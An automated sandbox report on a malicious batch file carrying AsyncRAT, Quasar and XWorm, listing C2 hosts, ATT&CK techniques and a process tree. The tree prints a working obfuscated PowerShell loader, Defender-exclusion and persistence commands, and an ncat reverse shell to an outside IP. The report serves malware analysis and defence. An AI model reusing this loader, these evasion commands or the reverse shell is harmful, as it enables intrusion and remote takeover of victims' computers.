asyncrat | 9618961af8c6db27588c649679634bec7ece8fabd3e48f02f33ac0b837b56d2e

Analysis

max time kernel
149s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15-07-2024 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zvgfd-main/Fanta_Is_Better_Than_Coke.bat
Size

5.9MB
MD5

01132c50b0d844fab3b44bdb50be7445
SHA1

c1212c8576c7794a2bbcf86f6a5bbd212fa23994
SHA256

874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf
SHA512

96be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31
SSDEEP

49152:Lr/kKxpfsnuEUYseGcIvj6O1Za5YUdf5ZOPv+MqmT/7yK3EasULD+ER/RmR:L+

Score

10^/10

asyncrat quasar xworm default slave execution persistence rat spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

xworm

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000

aes.plain

Extracted

Family

asyncrat

Botnet

Default

finally-grande.gl.at.ply.gg:25844

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes

encryption_key
CjDCAPF1JiLswgFipef3
install_name
$77Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Start-Up Application
subdirectory
$77

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral10/memory/2448-59-0x000001CD25720000-0x000001CD2573A000-memory.dmp	family_xworm
behavioral10/files/0x000700000002345d-73.dat	family_xworm
behavioral10/memory/3020-97-0x00000000004F0000-0x0000000000506000-memory.dmp	family_xworm
behavioral10/memory/3020-148-0x000000001C450000-0x000000001C45E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral10/memory/3136-16-0x0000015373BC0000-0x0000015374694000-memory.dmp	family_quasar
behavioral10/files/0x000800000002345b-65.dat	family_quasar
behavioral10/memory/2612-102-0x0000000000070000-0x00000000000DC000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral10/files/0x000800000002345c-94.dat	family_asyncrat

Blocklisted process makes network request 5 IoCs

flow	pid	Process
21	2448	powershell.exe
59	2448	powershell.exe
73	2448	powershell.exe
89	2448	powershell.exe
100	2448	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3136	powershell.exe
1988	powershell.exe
2448	powershell.exe
3964	powershell.exe
1552	powershell.exe
2876	powershell.exe
1948	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	7zip.exe

Executes dropped EXE 17 IoCs

pid	Process
3020	7zip.exe
1784	conhost.exe
2612	wininit.exe
4544	WinRunner.exe
3192	ncat.exe
3120	ncat.exe
2528	ncat.exe
4876	ncat.exe
4820	ncat.exe
3968	ncat.exe
748	ncat.exe
3024	ncat.exe
4544	ncat.exe
5060	ncat.exe
3188	ncat.exe
4960	ncat.exe
3520	ncat.exe

Loads dropped DLL 30 IoCs

pid	Process
3192	ncat.exe
3192	ncat.exe
3120	ncat.exe
3120	ncat.exe
2528	ncat.exe
2528	ncat.exe
4876	ncat.exe
4876	ncat.exe
4876	ncat.exe
4820	ncat.exe
4820	ncat.exe
4820	ncat.exe
3968	ncat.exe
3968	ncat.exe
748	ncat.exe
748	ncat.exe
3024	ncat.exe
3024	ncat.exe
3024	ncat.exe
4544	ncat.exe
4544	ncat.exe
5060	ncat.exe
5060	ncat.exe
3188	ncat.exe
3188	ncat.exe
4960	ncat.exe
4960	ncat.exe
4960	ncat.exe
3520	ncat.exe
3520	ncat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zvgfd-main\\WinRunner.exe"	WinRunner.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4768	schtasks.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3136	powershell.exe
3136	powershell.exe
1988	powershell.exe
1988	powershell.exe
2448	powershell.exe
2448	powershell.exe
3964	powershell.exe
3964	powershell.exe
1552	powershell.exe
1552	powershell.exe
3020	7zip.exe
2876	powershell.exe
2876	powershell.exe
1948	powershell.exe
1948	powershell.exe
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	1988	powershell.exe
Token: SeSecurityPrivilege	1988	powershell.exe
Token: SeTakeOwnershipPrivilege	1988	powershell.exe
Token: SeLoadDriverPrivilege	1988	powershell.exe
Token: SeSystemProfilePrivilege	1988	powershell.exe
Token: SeSystemtimePrivilege	1988	powershell.exe
Token: SeProfSingleProcessPrivilege	1988	powershell.exe
Token: SeIncBasePriorityPrivilege	1988	powershell.exe
Token: SeCreatePagefilePrivilege	1988	powershell.exe
Token: SeBackupPrivilege	1988	powershell.exe
Token: SeRestorePrivilege	1988	powershell.exe
Token: SeShutdownPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeSystemEnvironmentPrivilege	1988	powershell.exe
Token: SeRemoteShutdownPrivilege	1988	powershell.exe
Token: SeUndockPrivilege	1988	powershell.exe
Token: SeManageVolumePrivilege	1988	powershell.exe
Token: 33	1988	powershell.exe
Token: 34	1988	powershell.exe
Token: 35	1988	powershell.exe
Token: 36	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	1988	powershell.exe
Token: SeSecurityPrivilege	1988	powershell.exe
Token: SeTakeOwnershipPrivilege	1988	powershell.exe
Token: SeLoadDriverPrivilege	1988	powershell.exe
Token: SeSystemProfilePrivilege	1988	powershell.exe
Token: SeSystemtimePrivilege	1988	powershell.exe
Token: SeProfSingleProcessPrivilege	1988	powershell.exe
Token: SeIncBasePriorityPrivilege	1988	powershell.exe
Token: SeCreatePagefilePrivilege	1988	powershell.exe
Token: SeBackupPrivilege	1988	powershell.exe
Token: SeRestorePrivilege	1988	powershell.exe
Token: SeShutdownPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeSystemEnvironmentPrivilege	1988	powershell.exe
Token: SeRemoteShutdownPrivilege	1988	powershell.exe
Token: SeUndockPrivilege	1988	powershell.exe
Token: SeManageVolumePrivilege	1988	powershell.exe
Token: 33	1988	powershell.exe
Token: 34	1988	powershell.exe
Token: 35	1988	powershell.exe
Token: 36	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	1988	powershell.exe
Token: SeSecurityPrivilege	1988	powershell.exe
Token: SeTakeOwnershipPrivilege	1988	powershell.exe
Token: SeLoadDriverPrivilege	1988	powershell.exe
Token: SeSystemProfilePrivilege	1988	powershell.exe
Token: SeSystemtimePrivilege	1988	powershell.exe
Token: SeProfSingleProcessPrivilege	1988	powershell.exe
Token: SeIncBasePriorityPrivilege	1988	powershell.exe
Token: SeCreatePagefilePrivilege	1988	powershell.exe
Token: SeBackupPrivilege	1988	powershell.exe
Token: SeRestorePrivilege	1988	powershell.exe
Token: SeShutdownPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeSystemEnvironmentPrivilege	1988	powershell.exe
Token: SeRemoteShutdownPrivilege	1988	powershell.exe
Token: SeUndockPrivilege	1988	powershell.exe
Token: SeManageVolumePrivilege	1988	powershell.exe
Token: 33	1988	powershell.exe
Token: 34	1988	powershell.exe
Token: 35	1988	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3020	7zip.exe
2612	wininit.exe
2448	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 4928	3616	cmd.exe	85
PID 3616 wrote to memory of 4928	3616	cmd.exe	85
PID 3616 wrote to memory of 3136	3616	cmd.exe	86
PID 3616 wrote to memory of 3136	3616	cmd.exe	86
PID 3136 wrote to memory of 1988	3136	powershell.exe	87
PID 3136 wrote to memory of 1988	3136	powershell.exe	87
PID 3136 wrote to memory of 2972	3136	powershell.exe	90
PID 3136 wrote to memory of 2972	3136	powershell.exe	90
PID 2972 wrote to memory of 1392	2972	WScript.exe	91
PID 2972 wrote to memory of 1392	2972	WScript.exe	91
PID 1392 wrote to memory of 2736	1392	cmd.exe	93
PID 1392 wrote to memory of 2736	1392	cmd.exe	93
PID 1392 wrote to memory of 2448	1392	cmd.exe	94
PID 1392 wrote to memory of 2448	1392	cmd.exe	94
PID 2448 wrote to memory of 3020	2448	powershell.exe	95
PID 2448 wrote to memory of 3020	2448	powershell.exe	95
PID 2448 wrote to memory of 1784	2448	powershell.exe	97
PID 2448 wrote to memory of 1784	2448	powershell.exe	97
PID 2448 wrote to memory of 2612	2448	powershell.exe	96
PID 2448 wrote to memory of 2612	2448	powershell.exe	96
PID 2448 wrote to memory of 2612	2448	powershell.exe	96
PID 2448 wrote to memory of 4544	2448	powershell.exe	98
PID 2448 wrote to memory of 4544	2448	powershell.exe	98
PID 4544 wrote to memory of 1920	4544	WinRunner.exe	99
PID 4544 wrote to memory of 1920	4544	WinRunner.exe	99
PID 1920 wrote to memory of 3192	1920	cmd.exe	101
PID 1920 wrote to memory of 3192	1920	cmd.exe	101
PID 1920 wrote to memory of 3192	1920	cmd.exe	101
PID 3020 wrote to memory of 3964	3020	7zip.exe	102
PID 3020 wrote to memory of 3964	3020	7zip.exe	102
PID 3020 wrote to memory of 1552	3020	7zip.exe	104
PID 3020 wrote to memory of 1552	3020	7zip.exe	104
PID 2612 wrote to memory of 4768	2612	wininit.exe	106
PID 2612 wrote to memory of 4768	2612	wininit.exe	106
PID 2612 wrote to memory of 4768	2612	wininit.exe	106
PID 2448 wrote to memory of 2876	2448	powershell.exe	109
PID 2448 wrote to memory of 2876	2448	powershell.exe	109
PID 2448 wrote to memory of 1948	2448	powershell.exe	111
PID 2448 wrote to memory of 1948	2448	powershell.exe	111
PID 1920 wrote to memory of 3120	1920	cmd.exe	113
PID 1920 wrote to memory of 3120	1920	cmd.exe	113
PID 1920 wrote to memory of 3120	1920	cmd.exe	113
PID 1920 wrote to memory of 2528	1920	cmd.exe	114
PID 1920 wrote to memory of 2528	1920	cmd.exe	114
PID 1920 wrote to memory of 2528	1920	cmd.exe	114
PID 1920 wrote to memory of 4876	1920	cmd.exe	116
PID 1920 wrote to memory of 4876	1920	cmd.exe	116
PID 1920 wrote to memory of 4876	1920	cmd.exe	116
PID 1920 wrote to memory of 4820	1920	cmd.exe	117
PID 1920 wrote to memory of 4820	1920	cmd.exe	117
PID 1920 wrote to memory of 4820	1920	cmd.exe	117
PID 1920 wrote to memory of 3968	1920	cmd.exe	118
PID 1920 wrote to memory of 3968	1920	cmd.exe	118
PID 1920 wrote to memory of 3968	1920	cmd.exe	118
PID 1920 wrote to memory of 748	1920	cmd.exe	119
PID 1920 wrote to memory of 748	1920	cmd.exe	119
PID 1920 wrote to memory of 748	1920	cmd.exe	119
PID 1920 wrote to memory of 3024	1920	cmd.exe	120
PID 1920 wrote to memory of 3024	1920	cmd.exe	120
PID 1920 wrote to memory of 3024	1920	cmd.exe	120
PID 1920 wrote to memory of 4544	1920	cmd.exe	121
PID 1920 wrote to memory of 4544	1920	cmd.exe	121
PID 1920 wrote to memory of 4544	1920	cmd.exe	121
PID 1920 wrote to memory of 5060	1920	cmd.exe	122

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta_Is_Better_Than_Coke.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta_Is_Better_Than_Coke.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:4928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_304_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_304.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_304.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_304.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_304.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2448
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\7zip.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\7zip.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\7zip.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1552
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\wininit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\wininit.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2612
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Start-Up Application" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\wininit.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4768
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\conhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\conhost.exe"
        6⤵
        Executes dropped EXE
        
        PID:1784
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\WinRunner.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\WinRunner.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4544
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\$TMP~.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3188
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe
        
        C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12c844ed8342738dacc6eb0072c43257

SHA1
b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

SHA256
2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

SHA512
e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eeb3765a0b785f234084876821b1e55f

SHA1
6312e19d05292ef7b9c6127f26f1763645be6f2b

SHA256
2f3ef2bab47b2fb619171ccb5e41c4227093b0e572e4331ee18eecefa97c18e8

SHA512
85d516c29afb12e801a6b717c4b809eb8b0cb22dd286d569bb60ee6cf6f0670857e23566addc03a65eb7d9ec88b1805db7a787323863039d28019e426e2e6a7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
